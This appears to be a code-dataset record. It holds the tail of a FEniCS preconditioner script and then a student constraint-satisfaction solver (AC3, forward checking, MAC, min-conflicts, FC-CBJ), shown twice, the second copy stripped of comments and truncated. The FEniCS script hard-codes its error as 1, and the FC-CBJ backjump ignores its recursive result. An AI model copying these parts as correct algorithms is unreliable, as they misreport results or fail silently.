f = Constant(np.zeros(V.ufl_element().value_shape()))
L = inner(tau, f)*dx
A, _ = assemble_system(a, L, bc)
Q = FunctionSpace(mesh, 'CG', 1)
G = DiscreteOperators.build_gradient(V, Q)
pc = PETSc.PC().create(mesh.mpi_comm().tompi4py())
pc.setType('hypre')
pc.setHYPREType('ams')
pc.setHYPREDiscreteGradient(mat(G))
constants = [vec(interpolate(c, V).vector())
for c in (Constant((1, 0)), Constant((0, 1)))]
pc.setHYPRESetEdgeConstantVectors(*constants)
if hdiv0: pc.setHYPRESetBetaPoissonMatrix(None)
pc.setOperators(mat(A))
pc.setFromOptions()
pc.setUp()
self.pc = pc
self.A = A
def matvec(self, b):
if not isinstance(b, GenericVector):
return NotImplemented
x = self.A.create_vec(dim=1)
if len(x) != len(b):
raise RuntimeError(
'incompatible dimensions for PETSc matvec, %d != %d'%(len(x),len(b)))
self.pc.apply(vec(b), vec(x))
return x
def main(n):
x, y = sp.symbols('x[0] x[1]')
u = sp.sin(pi*x*(1-x)*y*(1-y))
sp_div = lambda f: f[0].diff(x, 1) + f[1].diff(y, 1)
sp_grad = lambda f: sp.Matrix([f.diff(x, 1), f.diff(y, 1)])
sigma = sp_grad(u)
f = -sp_div(sigma) + u
sigma_expr, u_expr, f_expr = list(map(as_expression, (sigma, u, f)))
mesh = UnitSquareMesh(n, n)
V = FunctionSpace(mesh, 'RT', 1)
Q = FunctionSpace(mesh, 'DG', 0)
W = (V, Q)
sigma, u = list(map(TrialFunction, W))
tau, v = list(map(TestFunction, W))
a00 = inner(sigma, tau)*dx
a01 = inner(div(tau), u)*dx
a10 = inner(div(sigma), v)*dx
a11 = -inner(u, v)*dx
L0 = inner(Constant((0, 0)), tau)*dx
L1 = inner(-f_expr, v)*dx
AA = block_assemble([[a00, a01], [a10, a11]])
bb = block_assemble([L0, L1])
B00 = HypreAMS(V)
b11 = inner(u, v)*dx
B11 = LumpedInvDiag(assemble(b11))
BB = block_mat([[B00, 0], [0, B11]])
AAinv = MinRes(AA, precond=BB, tolerance=1e-10, maxiter=500, show=2)
sigma_h, u_h = AAinv * bb
sigma_h, u_h = Function(V, sigma_h), Function(Q, u_h)
niters = len(AAinv.residuals) - 1
hmin = mesh.mpi_comm().tompi4py().allreduce(mesh.hmin(), pyMPI.MIN)
error = 1.
return hmin, V.dim()+Q.dim(), niters, error
if __name__ == '__main__':
msg = 'hmin = %g #dofs = %d, niters = %d, error = %g(%.2f)'
h0, error0 = None, None
for n in (8, 16, 32, 64, 128, 256, 512, 1024):
h, ndofs, niters, error = main(n)
if error0 is not None:
rate = ln(error/error0)/ln(h/h0)
else:
rate = -1
h0, error0 = h, error
print((msg % (h, ndofs, niters, error, rate)))
| true
| true
|
1c4465f3d1f0ed123bf563d4a6cfd6d59515b5f0
| 25,549
|
py
|
Python
|
1115201800312_project3/main.py
|
TollisK/AI-Berkley-CS188-Solutions
|
61de22110afdee9c60d00a0c6f612a50db5997d4
|
[
"MIT"
] | 1
|
2022-01-09T17:33:26.000Z
|
2022-01-09T17:33:26.000Z
|
1115201800312_project3/main.py
|
TollisK/AI-Berkley-CS188-Solutions
|
61de22110afdee9c60d00a0c6f612a50db5997d4
|
[
"MIT"
] | null | null | null |
1115201800312_project3/main.py
|
TollisK/AI-Berkley-CS188-Solutions
|
61de22110afdee9c60d00a0c6f612a50db5997d4
|
[
"MIT"
] | null | null | null |
import itertools
import random
import re
import string
from collections import defaultdict, Counter
from functools import reduce
from operator import eq, neg
import time
# from sortedcontainers import SortedSet
import search
from utils import argmin_random_tie, count, first, extend
variables = []
domains = {}
domtemp = {}
template = []
conlist = []
neighbors = {}
with open('dom2-f24.txt','r') as file:  # read the domains file
# reading each line
for line in file:
# reading each word
for word in line.split():
            template.append(int(word))  # collect everything in one list for easy handling
template.pop(0)
x=0
j=0
for i in range(1,len(template)):  # build a dictionary keyed by the first number, with all the rest as values
if i==x+1:
j = template[i]
continue
if j==0:
x = i
continue
if template[x] in domtemp:
domtemp[template[x]].append(template[i])
else:
domtemp[template[x]] = [template[i]]
j-=1
file.close()  # close the file (redundant after the with block)
template.clear()
i=0
with open('var2-f24.txt','r') as file:  # variable list
# reading each line
for line in file:
# reading each word
for word in line.split():
i+=1
template.append(int(word))
if i%2==0:
variables.append(int(word))
file.close()
template.pop(0)
for i in range(1,len(template)):  # build the domains dictionary
if i%2 == 1:
domains[template[i-1]] = domtemp[template[i]]
i=0
with open('ctr2-f24.txt','r') as file:  # read the constraints file
# reading each line
for line in file:
# reading each word
if i==0 :
i+=1
continue
for word in line.split():
            conlist.append(word)  # list of tokens for easy handling
            if i%4==1:  # build the neighbors
temp = int(word)
if int(word) not in neighbors:
neighbors[int(word)] = []
if i%4==2:
if int(word) not in neighbors:
neighbors[int(word)] = [temp]
else:
neighbors[int(word)].append(temp)
neighbors[temp].append(int(word))
i+=1
file.close()
condict = {}
for i in range(len(conlist)):  # dictionary keyed by a pair of variables
if i%4==0:
condict[(int(conlist[i]),int(conlist[i+1]))] = [conlist[i+2],int(conlist[i+3]),1]
cDict = defaultdict(dict)
for i in condict:  # lookup dictionary for the constraints function
cDict[i[0]] [i[1]] = [condict[i][0],condict[i][1], 1]
cDict[i[1]] [i[0]] = [condict[i][0],condict[i][1], 1]
def constraints(A,a,B,b):  # check whether variables A and B taking values a and b respectively satisfy their constraint
constraints.num+=1
if cDict[A][B][0] == '>' and abs(a-b)>cDict[A][B][1]:
return True
elif cDict[A][B][0] == '=' and abs(a-b)==cDict[A][B][1]:
return True
return False
constraints.num = 0  # global counter
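# Worked example (hypothetical constraint data): if cDict[0][1] == ['>', 3, 1],
# then constraints(0, 7, 1, 2) checks abs(7 - 2) = 5 > 3 and returns True,
# while constraints(0, 4, 1, 2) gives abs(4 - 2) = 2 and returns False.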
class CSP(search.Problem):
"""This class describes finite-domain Constraint Satisfaction Problems.
A CSP is specified by the following inputs:
variables A list of variables; each is atomic (e.g. int or string).
domains A dict of {var:[possible_value, ...]} entries.
neighbors A dict of {var:[var,...]} that for each variable lists
the other variables that participate in constraints.
constraints A function f(A, a, B, b) that returns true if neighbors
A, B satisfy the constraint when they have values A=a, B=b
In the textbook and in most mathematical definitions, the
constraints are specified as explicit pairs of allowable values,
but the formulation here is easier to express and more compact for
most cases (for example, the n-Queens problem can be represented
in O(n) space using this notation, instead of O(n^4) for the
explicit representation). In terms of describing the CSP as a
problem, that's all there is.
However, the class also supports data structures and methods that help you
solve CSPs by calling a search function on the CSP. Methods and slots are
as follows, where the argument 'a' represents an assignment, which is a
dict of {var:val} entries:
assign(var, val, a) Assign a[var] = val; do other bookkeeping
unassign(var, a) Do del a[var], plus other bookkeeping
nconflicts(var, val, a) Return the number of other variables that
conflict with var=val
curr_domains[var] Slot: remaining consistent values for var
Used by constraint propagation routines.
The following methods are used only by graph_search and tree_search:
actions(state) Return a list of actions
result(state, action) Return a successor of state
goal_test(state) Return true if all constraints satisfied
The following are just for debugging purposes:
nassigns Slot: tracks the number of assignments made
display(a) Print a human-readable representation
"""
def __init__(self, variables, domains, neighbors, constraints):
"""Construct a CSP problem. If variables is empty, it becomes domains.keys()."""
super().__init__(())
variables = variables or list(domains.keys())
self.variables = variables
self.domains = domains
self.neighbors = neighbors
self.constraints = constraints
self.curr_domains = None
self.nassigns = 0
self.i=0
def assign(self, var, val, assignment):
"""Add {var: val} to assignment; Discard the old value if any."""
assignment[var] = val
self.nassigns += 1
def unassign(self, var, assignment):
"""Remove {var: val} from assignment.
DO NOT call this if you are changing a variable to a new value;
just call assign for that."""
if var in assignment:
del assignment[var]
def nconflicts(self, var, val, assignment):
"""Return the number of conflicts var=val has with other variables."""
# Subclasses may implement this more efficiently
def conflict(var2):
return var2 in assignment and not self.constraints(var, val, var2, assignment[var2])
return count(conflict(v) for v in self.neighbors[var])
def display(self, assignment):
"""Show a human-readable representation of the CSP."""
# Subclasses can print in a prettier way, or display with a GUI
print(assignment)
# These methods are for the tree and graph-search interface:
def actions(self, state):
"""Return a list of applicable actions: non conflicting
assignments to an unassigned variable."""
if len(state) == len(self.variables):
return []
else:
assignment = dict(state)
var = first([v for v in self.variables if v not in assignment])
return [(var, val) for val in self.domains[var]
if self.nconflicts(var, val, assignment) == 0]
def result(self, state, action):
"""Perform an action and return the new state."""
(var, val) = action
return state + ((var, val),)
def goal_test(self, state):
"""The goal is to assign all variables, with all constraints satisfied."""
assignment = dict(state)
return (len(assignment) == len(self.variables)
and all(self.nconflicts(variables, assignment[variables], assignment) == 0
for variables in self.variables))
# These are for constraint propagation
def support_pruning(self):
"""Make sure we can prune values from domains. (We want to pay
for this only if we use it.)"""
if self.curr_domains is None:
self.curr_domains = {v: list(self.domains[v]) for v in self.variables}
def suppose(self, var, value):
"""Start accumulating inferences from assuming var=value."""
self.support_pruning()
removals = [(var, a) for a in self.curr_domains[var] if a != value]
self.curr_domains[var] = [value]
return removals
def prune(self, var, value, removals):
"""Rule out var=value."""
self.curr_domains[var].remove(value)
if removals is not None:
removals.append((var, value))
def choices(self, var):
"""Return all values for var that aren't currently ruled out."""
return (self.curr_domains or self.domains)[var]
def infer_assignment(self):
"""Return the partial assignment implied by the current inferences."""
self.support_pruning()
return {v: self.curr_domains[v][0]
for v in self.variables if 1 == len(self.curr_domains[v])}
def restore(self, removals):
"""Undo a supposition and all inferences from it."""
for B, b in removals:
self.curr_domains[B].append(b)
# This is for min_conflicts search
def conflicted_vars(self, current):
"""Return a list of variables in current assignment that are in conflict"""
return [var for var in self.variables
if self.nconflicts(var, current[var], current) > 0]
# ______________________________________________________________________________
# Constraint Propagation with AC3
def no_arc_heuristic(csp, queue):
return queue
# def dom_j_up(csp, queue):
# return SortedSet(queue, key=lambda t: neg(len(csp.curr_domains[t[1]])))
def AC3(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
"""[Figure 6.3]"""
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
checks = 0
while queue:
(Xi, Xj) = queue.pop()
revised, checks = revise(csp, Xi, Xj, removals, checks)
if revised:
if not csp.curr_domains[Xi]:
                cDict[Xi][Xj][2]+=1  # increase the weight of this constraint by 1
cDict[Xj][Xi][2]+=1
return False, checks # CSP is inconsistent
for Xk in csp.neighbors[Xi]:
if Xk != Xj:
queue.add((Xk, Xi))
return True, checks # CSP is satisfiable
def revise(csp, Xi, Xj, removals, checks=0):
"""Return true if we remove a value."""
revised = False
for x in csp.curr_domains[Xi][:]:
# If Xi=x conflicts with Xj=y for every possible y, eliminate Xi=x
# if all(not csp.constraints(Xi, x, Xj, y) for y in csp.curr_domains[Xj]):
conflict = True
for y in csp.curr_domains[Xj]:
if csp.constraints(Xi, x, Xj, y):
conflict = False
checks += 1
if not conflict:
break
if conflict:
csp.prune(Xi, x, removals)
revised = True
return revised, checks
# Constraint Propagation with AC3b: an improved version
# of AC3 with double-support domain-heuristic
def AC3b(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
checks = 0
while queue:
(Xi, Xj) = queue.pop()
# Si_p values are all known to be supported by Xj
# Sj_p values are all known to be supported by Xi
# Dj - Sj_p = Sj_u values are unknown, as yet, to be supported by Xi
Si_p, Sj_p, Sj_u, checks = partition(csp, Xi, Xj, checks)
if not Si_p:
return False, checks # CSP is inconsistent
revised = False
for x in set(csp.curr_domains[Xi]) - Si_p:
csp.prune(Xi, x, removals)
revised = True
if revised:
for Xk in csp.neighbors[Xi]:
if Xk != Xj:
queue.add((Xk, Xi))
if (Xj, Xi) in queue:
if isinstance(queue, set):
# or queue -= {(Xj, Xi)} or queue.remove((Xj, Xi))
queue.difference_update({(Xj, Xi)})
else:
queue.difference_update((Xj, Xi))
# the elements in D_j which are supported by Xi are given by the union of Sj_p with the set of those
# elements of Sj_u which further processing will show to be supported by some vi_p in Si_p
for vj_p in Sj_u:
for vi_p in Si_p:
conflict = True
if csp.constraints(Xj, vj_p, Xi, vi_p):
conflict = False
Sj_p.add(vj_p)
checks += 1
if not conflict:
break
revised = False
for x in set(csp.curr_domains[Xj]) - Sj_p:
csp.prune(Xj, x, removals)
revised = True
if revised:
for Xk in csp.neighbors[Xj]:
if Xk != Xi:
queue.add((Xk, Xj))
return True, checks # CSP is satisfiable
def partition(csp, Xi, Xj, checks=0):
Si_p = set()
Sj_p = set()
Sj_u = set(csp.curr_domains[Xj])
for vi_u in csp.curr_domains[Xi]:
conflict = True
# now, in order to establish support for a value vi_u in Di it seems better to try to find a support among
# the values in Sj_u first, because for each vj_u in Sj_u the check (vi_u, vj_u) is a double-support check
# and it is just as likely that any vj_u in Sj_u supports vi_u than it is that any vj_p in Sj_p does...
for vj_u in Sj_u - Sj_p:
# double-support check
if csp.constraints(Xi, vi_u, Xj, vj_u):
conflict = False
Si_p.add(vi_u)
Sj_p.add(vj_u)
checks += 1
if not conflict:
break
# ... and only if no support can be found among the elements in Sj_u, should the elements vj_p in Sj_p be used
# for single-support checks (vi_u, vj_p)
if conflict:
for vj_p in Sj_p:
# single-support check
if csp.constraints(Xi, vi_u, Xj, vj_p):
conflict = False
Si_p.add(vi_u)
checks += 1
if not conflict:
break
return Si_p, Sj_p, Sj_u - Sj_p, checks
# Constraint Propagation with AC4
def AC4(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
support_counter = Counter()
variable_value_pairs_supported = defaultdict(set)
unsupported_variable_value_pairs = []
checks = 0
# construction and initialization of support sets
while queue:
(Xi, Xj) = queue.pop()
revised = False
for x in csp.curr_domains[Xi][:]:
for y in csp.curr_domains[Xj]:
if csp.constraints(Xi, x, Xj, y):
support_counter[(Xi, x, Xj)] += 1
variable_value_pairs_supported[(Xj, y)].add((Xi, x))
checks += 1
if support_counter[(Xi, x, Xj)] == 0:
csp.prune(Xi, x, removals)
revised = True
unsupported_variable_value_pairs.append((Xi, x))
if revised:
if not csp.curr_domains[Xi]:
return False, checks # CSP is inconsistent
# propagation of removed values
while unsupported_variable_value_pairs:
Xj, y = unsupported_variable_value_pairs.pop()
for Xi, x in variable_value_pairs_supported[(Xj, y)]:
revised = False
if x in csp.curr_domains[Xi][:]:
support_counter[(Xi, x, Xj)] -= 1
if support_counter[(Xi, x, Xj)] == 0:
csp.prune(Xi, x, removals)
revised = True
unsupported_variable_value_pairs.append((Xi, x))
if revised:
if not csp.curr_domains[Xi]:
return False, checks # CSP is inconsistent
return True, checks # CSP is satisfiable
# ______________________________________________________________________________
# CSP Backtracking Search
# Variable ordering
def first_unassigned_variable(assignment, csp):
"""The default variable order."""
return first([var for var in csp.variables if var not in assignment])
def mrv(assignment, csp):
"""Minimum-remaining-values heuristic."""
return argmin_random_tie([v for v in csp.variables if v not in assignment],
key=lambda var: num_legal_values(csp, var, assignment))
def num_legal_values(csp, var, assignment):
if csp.curr_domains:
return len(csp.curr_domains[var])
else:
return count(csp.nconflicts(var, val, assignment) == 0 for val in csp.domains[var])
def domwdeg(assignment, csp):  # dom/wdeg variable-ordering heuristic (domain size over weighted degree)
csp.support_pruning()
fddg = 100
for var in csp.variables:
if var not in assignment:
dom = len(csp.curr_domains[var])
wdeg = 0
for nei in neighbors[var]:
wdeg+=cDict[var][nei][2]
ddg = dom / wdeg
if fddg > ddg:
fddg = ddg
fvar = var
return fvar
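# Worked example (hypothetical numbers): an unassigned variable with 4 remaining
# values whose incident constraint weights sum to 8 scores 4 / 8 = 0.5; a
# variable scoring 0.25 would be preferred, since the smallest dom/wdeg wins.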
# Value ordering
def unordered_domain_values(var, assignment, csp):
"""The default value order."""
return csp.choices(var)
def lcv(var, assignment, csp):
"""Least-constraining-values heuristic."""
return sorted(csp.choices(var), key=lambda val: csp.nconflicts(var, val, assignment))
# Inference
def no_inference(csp, var, value, assignment, removals):
return True
def forward_checking(csp, var, value, assignment, removals):
"""Prune neighbor values inconsistent with var=value."""
csp.support_pruning()
for B in csp.neighbors[var]:
if B not in assignment:
for b in csp.curr_domains[B][:]:
if not csp.constraints(var, value, B, b):
csp.prune(B, b, removals)
if not csp.curr_domains[B]:
                        # bump the (var, B) weight in the dict
                        cDict[var][B][2]+=1  # increase the weight by 1
cDict[B][var][2]+=1
return False
return True
def mac(csp, var, value, assignment, removals, constraint_propagation=AC3):
"""Maintain arc consistency."""
return constraint_propagation(csp, {(X, var) for X in csp.neighbors[var]}, removals)
# The search, proper
# fc-dbk is the same as backtracking
def backtracking_search(csp, select_unassigned_variable=first_unassigned_variable,
order_domain_values=unordered_domain_values, inference=no_inference):
"""[Figure 6.5]"""
def backtrack(assignment):
global start_time
        if time.time()-start_time>3000:  # abort the search if it runs longer than 3000 seconds
return None
backtracking_search.num +=1
if len(assignment) == len(csp.variables):
return assignment
var = select_unassigned_variable(assignment, csp)
for value in order_domain_values(var, assignment, csp):
if 0 == csp.nconflicts(var, value, assignment):
csp.assign(var, value, assignment)
removals = csp.suppose(var, value)
if inference(csp, var, value, assignment, removals):
result = backtrack(assignment)
if result is not None:
return result
csp.restore(removals)
csp.unassign(var, assignment)
return None
result = backtrack({})
assert result is None or csp.goal_test(result)
return result
backtracking_search.num = 0
# ______________________________________________________________________________
# Min-conflicts Hill Climbing search for CSPs
def min_conflicts(csp, max_steps=50):
"""Solve a CSP by stochastic Hill Climbing on the number of conflicts."""
# Generate a complete assignment for all variables (probably with conflicts)
csp.current = current = {}
for var in csp.variables:
val = min_conflicts_value(csp, var, current)
csp.assign(var, val, current)
# Now repeatedly choose a random conflicted variable and change it
for _ in range(max_steps):
conflicted = csp.conflicted_vars(current)
if not conflicted:
return current
var = random.choice(conflicted)
val = min_conflicts_value(csp, var, current)
csp.assign(var, val, current)
return None
min_conflicts.num = 0
def min_conflicts_value(csp, var, current):
    """Return the value that will give var the least number of conflicts.
    If there is a tie, choose at random."""
    min_conflicts_value.num += 1
return argmin_random_tie(csp.domains[var], key=lambda val: csp.nconflicts(var, val, current))
min_conflicts_value.num = 0
neighdict={}
for i in variables:
neighdict[i]=set()
def FC(csp, var, value, assignment, removals):  # forward checking that also records conflict sets for CBJ
"""Prune neighbor values inconsistent with var=value."""
csp.support_pruning()
for B in csp.neighbors[var]:
for b in csp.curr_domains[B][:]:
if not csp.constraints(var, value, B, b):
if B in assignment:
                    neighdict[var].add(B)  # record the neighbor in this variable's conflict set
csp.prune(B, b, removals)
if not csp.curr_domains[B]:
if var<B:
cDict[var][B][2]+=1
else:
cDict[B][var][2]+=1
return False
return True
def fc_cbj(csp, select_unassigned_variable=domwdeg,  # based on backtracking_search
order_domain_values=unordered_domain_values, inference=FC):
"""[Figure 6.5]"""
def backtrack(assignment,myvar=None):
fc_cbj.num+=1
if len(assignment) == len(csp.variables):
return assignment
if myvar==None:
var = select_unassigned_variable(assignment, csp)
else:
var=myvar
for value in order_domain_values(var, assignment, csp):
if 0 == csp.nconflicts(var, value, assignment):
csp.assign(var, value, assignment)
removals = csp.suppose(var, value)
if inference(csp, var, value, assignment, removals):
result = backtrack(assignment)
if result is not None:
return result
csp.restore(removals)
csp.unassign(var, assignment)
        if neighdict[var]:  # if no value worked, backjump to a specific variable
            proo=max(neighdict[var])  # pick the largest variable, since it is also the most recently assigned one
            neighdict[var].remove(proo)  # drop the jump target from the set
            neighdict[proo].update(neighdict[var])  # merge the current conflict set into the target's
neighdict[var].clear()
backtrack(assignment,proo)
return None
result = backtrack({})
assert result is None or csp.goal_test(result)
return result
fc_cbj.num =0
mycsp = CSP(variables,domains,neighbors,constraints)
global start_time
print("\n\nRunning with: forward_checking\n")
start_time = time.time()
if backtracking_search(mycsp,domwdeg,unordered_domain_values,forward_checking):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",backtracking_search.num)
print("\n\nRunning with: MAC\n")
backtracking_search.num = 0
constraints.num=0
start_time = time.time()
if backtracking_search(mycsp,domwdeg,unordered_domain_values,mac):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",backtracking_search.num)
print("\n\nRunning with: min_conflict\n")
backtracking_search.num = 0
constraints.num=0
start_time = time.time()
if min_conflicts(mycsp):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",min_conflicts_value.num)
print("\n\nRunning with: FC-CBJ\n")
start_time = time.time()
constraints.num=0
if fc_cbj(mycsp,domwdeg,unordered_domain_values,FC):
print("SAT")
else:
print("UNSAT")
print("--- %s seconds ---" % (time.time() - start_time))
print("CONSTRAINT",constraints.num)
print("NODES",fc_cbj.num)
| 37.682891
| 137
| 0.594309
|
import itertools
import random
import re
import string
from collections import defaultdict, Counter
from functools import reduce
from operator import eq, neg
import time
import search
from utils import argmin_random_tie, count, first, extend
variables = []
domains = {}
domtemp = {}
template = []
conlist = []
neighbors = {}
with open('dom2-f24.txt','r') as file:
for line in file:
for word in line.split():
template.append(int(word))
template.pop(0)
x=0
j=0
for i in range(1,len(template)):
if i==x+1:
j = template[i]
continue
if j==0:
x = i
continue
if template[x] in domtemp:
domtemp[template[x]].append(template[i])
else:
domtemp[template[x]] = [template[i]]
j-=1
file.close()
template.clear()
i=0
with open('var2-f24.txt','r') as file:
for line in file:
for word in line.split():
i+=1
template.append(int(word))
if i%2==0:
variables.append(int(word))
file.close()
template.pop(0)
for i in range(1,len(template)):
if i%2 == 1:
domains[template[i-1]] = domtemp[template[i]]
i=0
with open('ctr2-f24.txt','r') as file:
for line in file:
if i==0 :
i+=1
continue
for word in line.split():
conlist.append(word)
if i%4==1:
temp = int(word)
if int(word) not in neighbors:
neighbors[int(word)] = []
if i%4==2:
if int(word) not in neighbors:
neighbors[int(word)] = [temp]
else:
neighbors[int(word)].append(temp)
neighbors[temp].append(int(word))
i+=1
file.close()
condict = {}
for i in range(len(conlist)):
if i%4==0:
condict[(int(conlist[i]),int(conlist[i+1]))] = [conlist[i+2],int(conlist[i+3]),1]
cDict = defaultdict(dict)
for i in condict:
cDict[i[0]] [i[1]] = [condict[i][0],condict[i][1], 1]
cDict[i[1]] [i[0]] = [condict[i][0],condict[i][1], 1]
def constraints(A,a,B,b):
constraints.num+=1
if cDict[A][B][0] == '>' and abs(a-b)>cDict[A][B][1]:
return True
elif cDict[A][B][0] == '=' and abs(a-b)==cDict[A][B][1]:
return True
return False
constraints.num = 0
class CSP(search.Problem):
def __init__(self, variables, domains, neighbors, constraints):
super().__init__(())
variables = variables or list(domains.keys())
self.variables = variables
self.domains = domains
self.neighbors = neighbors
self.constraints = constraints
self.curr_domains = None
self.nassigns = 0
self.i=0
def assign(self, var, val, assignment):
assignment[var] = val
self.nassigns += 1
def unassign(self, var, assignment):
if var in assignment:
del assignment[var]
def nconflicts(self, var, val, assignment):
def conflict(var2):
return var2 in assignment and not self.constraints(var, val, var2, assignment[var2])
return count(conflict(v) for v in self.neighbors[var])
def display(self, assignment):
print(assignment)
def actions(self, state):
if len(state) == len(self.variables):
return []
else:
assignment = dict(state)
var = first([v for v in self.variables if v not in assignment])
return [(var, val) for val in self.domains[var]
if self.nconflicts(var, val, assignment) == 0]
def result(self, state, action):
(var, val) = action
return state + ((var, val),)
def goal_test(self, state):
assignment = dict(state)
return (len(assignment) == len(self.variables)
and all(self.nconflicts(variables, assignment[variables], assignment) == 0
for variables in self.variables))
def support_pruning(self):
if self.curr_domains is None:
self.curr_domains = {v: list(self.domains[v]) for v in self.variables}
def suppose(self, var, value):
self.support_pruning()
removals = [(var, a) for a in self.curr_domains[var] if a != value]
self.curr_domains[var] = [value]
return removals
def prune(self, var, value, removals):
self.curr_domains[var].remove(value)
if removals is not None:
removals.append((var, value))
def choices(self, var):
return (self.curr_domains or self.domains)[var]
def infer_assignment(self):
self.support_pruning()
return {v: self.curr_domains[v][0]
for v in self.variables if 1 == len(self.curr_domains[v])}
def restore(self, removals):
for B, b in removals:
self.curr_domains[B].append(b)
def conflicted_vars(self, current):
return [var for var in self.variables
if self.nconflicts(var, current[var], current) > 0]
def no_arc_heuristic(csp, queue):
return queue
def AC3(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
checks = 0
while queue:
(Xi, Xj) = queue.pop()
revised, checks = revise(csp, Xi, Xj, removals, checks)
if revised:
if not csp.curr_domains[Xi]:
cDict[Xi][Xj][2]+=1
cDict[Xj][Xi][2]+=1
return False, checks
for Xk in csp.neighbors[Xi]:
if Xk != Xj:
queue.add((Xk, Xi))
return True, checks
def revise(csp, Xi, Xj, removals, checks=0):
revised = False
for x in csp.curr_domains[Xi][:]:
conflict = True
for y in csp.curr_domains[Xj]:
if csp.constraints(Xi, x, Xj, y):
conflict = False
checks += 1
if not conflict:
break
if conflict:
csp.prune(Xi, x, removals)
revised = True
return revised, checks
def AC3b(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
checks = 0
while queue:
(Xi, Xj) = queue.pop()
Si_p, Sj_p, Sj_u, checks = partition(csp, Xi, Xj, checks)
if not Si_p:
return False, checks
revised = False
for x in set(csp.curr_domains[Xi]) - Si_p:
csp.prune(Xi, x, removals)
revised = True
if revised:
for Xk in csp.neighbors[Xi]:
if Xk != Xj:
queue.add((Xk, Xi))
if (Xj, Xi) in queue:
if isinstance(queue, set):
queue.difference_update({(Xj, Xi)})
else:
queue.difference_update((Xj, Xi))
for vj_p in Sj_u:
for vi_p in Si_p:
conflict = True
if csp.constraints(Xj, vj_p, Xi, vi_p):
conflict = False
Sj_p.add(vj_p)
checks += 1
if not conflict:
break
revised = False
for x in set(csp.curr_domains[Xj]) - Sj_p:
csp.prune(Xj, x, removals)
revised = True
if revised:
for Xk in csp.neighbors[Xj]:
if Xk != Xi:
queue.add((Xk, Xj))
return True, checks
def partition(csp, Xi, Xj, checks=0):
Si_p = set()
Sj_p = set()
Sj_u = set(csp.curr_domains[Xj])
for vi_u in csp.curr_domains[Xi]:
conflict = True
for vj_u in Sj_u - Sj_p:
if csp.constraints(Xi, vi_u, Xj, vj_u):
conflict = False
Si_p.add(vi_u)
Sj_p.add(vj_u)
checks += 1
if not conflict:
break
if conflict:
for vj_p in Sj_p:
if csp.constraints(Xi, vi_u, Xj, vj_p):
conflict = False
Si_p.add(vi_u)
checks += 1
if not conflict:
break
return Si_p, Sj_p, Sj_u - Sj_p, checks
def AC4(csp, queue=None, removals=None, arc_heuristic=no_arc_heuristic):
if queue is None:
queue = {(Xi, Xk) for Xi in csp.variables for Xk in csp.neighbors[Xi]}
csp.support_pruning()
queue = arc_heuristic(csp, queue)
support_counter = Counter()
variable_value_pairs_supported = defaultdict(set)
unsupported_variable_value_pairs = []
checks = 0
while queue:
(Xi, Xj) = queue.pop()
revised = False
for x in csp.curr_domains[Xi][:]:
for y in csp.curr_domains[Xj]:
if csp.constraints(Xi, x, Xj, y):
support_counter[(Xi, x, Xj)] += 1
variable_value_pairs_supported[(Xj, y)].add((Xi, x))
checks += 1
if support_counter[(Xi, x, Xj)] == 0:
csp.prune(Xi, x, removals)
revised = True
unsupported_variable_value_pairs.append((Xi, x))
if revised:
if not csp.curr_domains[Xi]:
return False, checks
while unsupported_variable_value_pairs:
Xj, y = unsupported_variable_value_pairs.pop()
for Xi, x in variable_value_pairs_supported[(Xj, y)]:
revised = False
if x in csp.curr_domains[Xi][:]:
support_counter[(Xi, x, Xj)] -= 1
if support_counter[(Xi, x, Xj)] == 0:
csp.prune(Xi, x, removals)
revised = True
unsupported_variable_value_pairs.append((Xi, x))
if revised:
if not csp.curr_domains[Xi]:
return False, checks
return True, checks
def first_unassigned_variable(assignment, csp):
return first([var for var in csp.variables if var not in assignment])
def mrv(assignment, csp):
return argmin_random_tie([v for v in csp.variables if v not in assignment],
key=lambda var: num_legal_values(csp, var, assignment))
def num_legal_values(csp, var, assignment):
if csp.curr_domains:
return len(csp.curr_domains[var])
else:
return count(csp.nconflicts(var, val, assignment) == 0 for val in csp.domains[var])
def domwdeg(assignment, csp):
csp.support_pruning()
fddg = 100
for var in csp.variables:
if var not in assignment:
dom = len(csp.curr_domains[var])
wdeg = 0
for nei in neighbors[var]:
wdeg+=cDict[var][nei][2]
ddg = dom / wdeg
if fddg > ddg:
fddg = ddg
fvar = var
return fvar
def unordered_domain_values(var, assignment, csp):
return csp.choices(var)
def lcv(var, assignment, csp):
return sorted(csp.choices(var), key=lambda val: csp.nconflicts(var, val, assignment))
def no_inference(csp, var, value, assignment, removals):
return True
def forward_checking(csp, var, value, assignment, removals):
csp.support_pruning()
for B in csp.neighbors[var]:
if B not in assignment:
for b in csp.curr_domains[B][:]:
if not csp.constraints(var, value, B, b):
csp.prune(B, b, removals)
if not csp.curr_domains[B]:
cDict[var][B][2]+=1
cDict[B][var][2]+=1
return False
return True
def mac(csp, var, value, assignment, removals, constraint_propagation=AC3):
return constraint_propagation(csp, {(X, var) for X in csp.neighbors[var]}, removals)
def backtracking_search(csp, select_unassigned_variable=first_unassigned_variable,
order_domain_values=unordered_domain_values, inference=no_inference):
def backtrack(assignment):
global start_time
if time.time()-start_time>3000:
return None
backtracking_search.num +=1
if len(assignment) == len(csp.variables):
return assignment
var = select_unassigned_variable(assignment, csp)
